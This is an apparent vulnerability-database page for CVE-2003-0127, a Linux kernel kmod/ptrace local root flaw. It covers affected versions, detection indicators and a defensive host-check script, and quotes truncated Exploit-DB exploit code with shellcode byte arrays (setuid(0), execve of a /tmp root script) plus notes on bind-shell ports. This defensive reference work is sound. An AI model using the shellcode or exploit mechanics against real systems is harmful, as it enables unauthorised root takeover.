CVE-2003-0127
Published 2003-03-31
CVSS 2.0: 7.2 (high), vector AV:L/AC:L/Au:N/C:C/I:C/A:C · listed in VulnCheck KEV
Exploited in the wild
EPSS: 1.58% (72.5th percentile)
The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.
Affected
47 affected version ranges (per-range bounds were not extracted; the ranges below are taken from the CVE description)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | 2.2.x before 2.2.25 | 2.2.25 |
| linux | linux_kernel | 2.4.x before 2.4.21 | 2.4.21 |
Detection & IOCs (extracted from sources)
- Shellcode bytes (IOC): `\x90\x90\xeb\x1f\xb8\xb6\x00\x00\x00\x5b\x31\xc9\x89\xca\xcd\x80\xb8\x0f\x00\x00\x00\xb9\xed\x0d\x00\x00\xcd\x80\x89\xd0\x89\xd3\x40\xcd\x80\xe8\xdc\xff\xff\xff`
- Shellcode bytes (IOC): `\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80`
- Monitor for unprivileged processes issuing socket(AF_SECURITY, SOCK_STREAM, 1) as a trigger to force kernel module loading (kmod); this is the exploit's mechanism for making the kernel spawn the privileged child process.
- Alert on creation of world-executable scripts at /tmp/w00w00w, the hardcoded payload drop path used by one exploit variant.
- Detect processes writing shellcode via PTRACE_POKETEXT into a process whose /proc/<pid>/status shows uid=0/euid=0 while the tracing process is unprivileged.
- Watch for rapid sequential ptrace(PTRACE_ATTACH) attempts across a range of PIDs (chldpid+1 through chldpid+10, or 1 through 30000 in randomized mode) from a single process, indicative of PID-brute-forcing exploit variants.
- Detect inbound connections on port 4112 or 24876 on a host running a vulnerable kernel, as exploit variants bind a root shell on these ports post-exploitation.
- Temporary mitigation indicator: writing a non-executable path to /proc/sys/kernel/modprobe disables kmod and closes the attack vector.
- The exploit has a hardcoded 10-second alarm timeout; if the race is not won within that window, it aborts. Detection logic should account for repeated short-lived exploit process executions.
- Affected kernel versions are Linux 2.2.x before 2.2.25 and 2.4.x before 2.4.21. Systems running patched versions are not vulnerable.
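A host-side check written for this entry (an added example, not from the advisory or from any of the exploits quoted on this page) that combines the affected-range rule with the kmod mitigation indicator above. It assumes `uname -r` output of the form `2.4.20-8smp` and that the configured module loader path is readable from /proc/sys/kernel/modprobe.

```shell
#!/bin/sh
# Added example: vulnerability and mitigation check for CVE-2003-0127.
# Not part of the advisory or the exploit code on this page.

# is_vulnerable_kernel VERSION -> exit 0 if VERSION falls in an affected
# range (2.2.x before 2.2.25, 2.4.x before 2.4.21), 1 otherwise.
is_vulnerable_kernel() {
    ver=$1
    base=${ver%%-*}                         # drop distro suffix ("-8smp")
    major=$(printf '%s' "$base" | cut -d. -f1)
    minor=$(printf '%s' "$base" | cut -d. -f2)
    patch=$(printf '%s' "$base" | cut -d. -f3 | sed 's/[^0-9].*//')
    [ -z "$patch" ] && patch=0              # "2.4" alone counts as 2.4.0
    case "$major.$minor" in
        2.2) [ "$patch" -lt 25 ] ;;
        2.4) [ "$patch" -lt 21 ] ;;
        *)   return 1 ;;
    esac
}

# kmod_disabled MODPROBE_PATH -> exit 0 if the configured module loader is
# empty or not an executable file, i.e. the temporary mitigation described
# in the detection notes (non-executable path in kernel.modprobe) is active.
kmod_disabled() {
    path=$1
    [ -z "$path" ] && return 0
    [ ! -x "$path" ]
}

# check_host -> 0 not affected, 1 affected with kmod active, 2 affected but
# mitigated. Reads the live kernel version and modprobe setting.
check_host() {
    kver=$(uname -r)
    if is_vulnerable_kernel "$kver"; then
        echo "kernel $kver is in an affected range"
        modprobe_path=$(cat /proc/sys/kernel/modprobe 2>/dev/null)
        if kmod_disabled "$modprobe_path"; then
            echo "  kmod mitigation in place (modprobe path: '$modprobe_path')"
            return 2
        fi
        echo "  kmod active: upgrade the kernel or apply the mitigation"
        return 1
    fi
    echo "kernel $kver is not in an affected range"
    return 0
}
```

Source the file and call `check_host`; the exit status distinguishes an unaffected kernel (0) from an affected one with kmod active (1) or mitigated (2).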
CVSS provenance
- nvd (CVSS 2.0): 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C
- vulncheck: 7.2 HIGH
- vendor_redhat: 7.2 HIGH
Red Hat (vendor_redhat · 2003-03-17 · CVSS 7.2)
CVE-2003-0127 [HIGH] security flaw
GHSA (ghsa_unreviewed · 2022-05-03)
CVE-2003-0127 [HIGH] GHSA-jhjp-mfjv-rvhx: The kernel module loader in Linux kernel 2
VulnCheck (vulncheck · 2003 · CVSS 7.2)
CVE-2003-0127 [HIGH] Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21 Kernel Module Loader Privilege Escalation
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB (exploitdb · 2003-04-14)
CVE-2003-0127 Linux Kernel < 2.4.20 - Module Loader Privilege Escalation
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define TMPSIZE 4096
#define FMAX 768
#define UIDNUM 6
#define MMSIZE (4096*1)
#define MAXSTACK 0xc0000000
// where to put the root script
#define SHELL "/tmp/w00w00w"
// what to open to run modprobe
#define ENTRY "/dev/dsp3"
struct uids {
unsigned uid;
unsigned euid;
unsigned suid;
unsigned fsuid;
};
// thanks to the epcs2.c code :-))
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\
xdb\xb0\x17\xcd\x80" /* setuid(0) */
"\x31\xc0\xb0\x2e\xcd\x80" "\x31\xc0\x50\xeb\x17\x8b\x1c\x24"
/* execve(SHELL) */
"\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */
"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
"\xc3\x40\xcd\x80\xe8\xe4\xff\xff" "\xff" SHELL "\
Exploit-DB (exploitdb · 2003-04-10)
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)
---
/*
source: https://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 10 April 2003
*
* Wojciech Purczynski [ [email protected] ], says (in his code):
*
* [quote]
* This code exploits a race condition in kernel/kmod.
Exploit-DB (exploitdb · 2003-03-30)
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
---
/*
* Linux kernel ptrace/kmod local root exploit
*
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat
* and others.
*
* Wojciech Purczynski
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include
#include
#include
#include
#include
#include
#include
#
Exploit-DB (exploitdb · 2003-03-17)
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)
---
/*
source: https://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
*
* have fun
*/
#define ANY_SUID "/usr/bin/passwd"
#include
#include
#include
#include
#include
#include
#include
#inc
References
- ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-020.0.txt
- http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0134.html
- http://marc.info/?l=bugtraq&m=105301461726555&w=2
- http://rhn.redhat.com/errata/RHSA-2003-088.html
- http://rhn.redhat.com/errata/RHSA-2003-098.html
- http://security.gentoo.org/glsa/glsa-200303-17.xml
- http://www.debian.org/security/2003/dsa-270
- http://www.debian.org/security/2003/dsa-276
- http://www.debian.org/security/2003/dsa-311
- http://www.debian.org/security/2003/dsa-312
- http://www.debian.org/security/2003/dsa-332
- http://www.debian.org/security/2003/dsa-336
- http://www.debian.org/security/2004/dsa-423
- http://www.debian.org/security/2004/dsa-495
- http://www.kb.cert.org/vuls/id/628849
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:038
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:039
- http://www.redhat.com/support/errata/RHSA-2003-103.html
- http://www.redhat.com/support/errata/RHSA-2003-145.html
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A254